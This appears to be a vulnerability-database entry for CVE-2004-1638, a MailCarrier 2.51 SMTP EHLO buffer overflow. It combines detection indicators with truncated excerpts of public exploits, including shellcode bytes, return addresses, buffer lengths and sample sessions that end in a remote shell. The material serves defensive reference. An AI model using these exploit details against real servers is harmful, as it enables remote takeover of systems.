CVE-2004-1638
Published 2004-10-16
Priority P3 · 49 · high · CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 62.76% (99.1th percentile)
Buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long (1) EHLO and possibly (2) HELO command.
Detection & IOCs (extracted from sources)
Bytes:
- 0x0fa14c63
- 0x0fa14ccf
- 0x7c2ee21b
- 0x7d17dd13
- \xD3\x39\xD3\x77
- \xEB\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF
- \xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x81\x59\x47
- Detect oversized EHLO/HELO commands on SMTP port 25 targeting MailCarrier 2.51; exploit payloads use buffers of ~5093–5106 bytes followed by a return address.
- Fingerprint vulnerable MailCarrier 2.51 SMTP banners containing the string 'ESMTP TABS Mail Server for Windows NT' to identify exposed targets.
- Alert on post-exploitation reverse shell connections to port 31337 originating from SMTP servers running MailCarrier.
- The exploit's bad characters for payload encoding are the null byte, LF, CR, and colon (\x00\x0a\x0d:); use these to tune SMTP content inspection signatures.
- The return address used in exploitation points into expsrv.dll (jmp esp gadget); monitor for abnormal execution flow involving expsrv.dll on Windows SMTP servers.
- Return addresses are platform-specific; the Metasploit module targets Windows 2000 SP0 through XP SP2 (EN/FR/GR) only, using gadgets inside expsrv.dll.
- The Metasploit payload space is limited to 300 bytes and requires LHOST to be set because the overflow length is calculated as 5106 minus the LHOST string length.
No detection rules found.
Exploit-DB · 2010-04-30
TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)
---
##
# $Id: mailcarrier_smtp_ehlo.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
'Description' => %q{
This module exploits the MailCarrier v2.51 suite SMTP service.
The stack is overwritten when sending an overly long EHLO command.
},
'Author' => [ 'Patrick Webster ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-1638' ],
[ 'OSVDB', '11174' ],
[ 'BID', '
Exploit-DB · 2004-11-16
TABS MailCarrier 2.51 - Remote Buffer Overflow
---
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x8
Exploit-DB · 2004-10-26
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
---
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO
Metasploit
TABS MailCarrier v2.51 SMTP EHLO Overflow
This module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command.
No writeups or analysis indexed.
References:
- http://marc.info/?l=bugtraq&m=109880961630050&w=2
- http://secunia.com/advisories/12999
- http://www.securityfocus.com/bid/11535
- https://exchange.xforce.ibmcloud.com/vulnerabilities/17861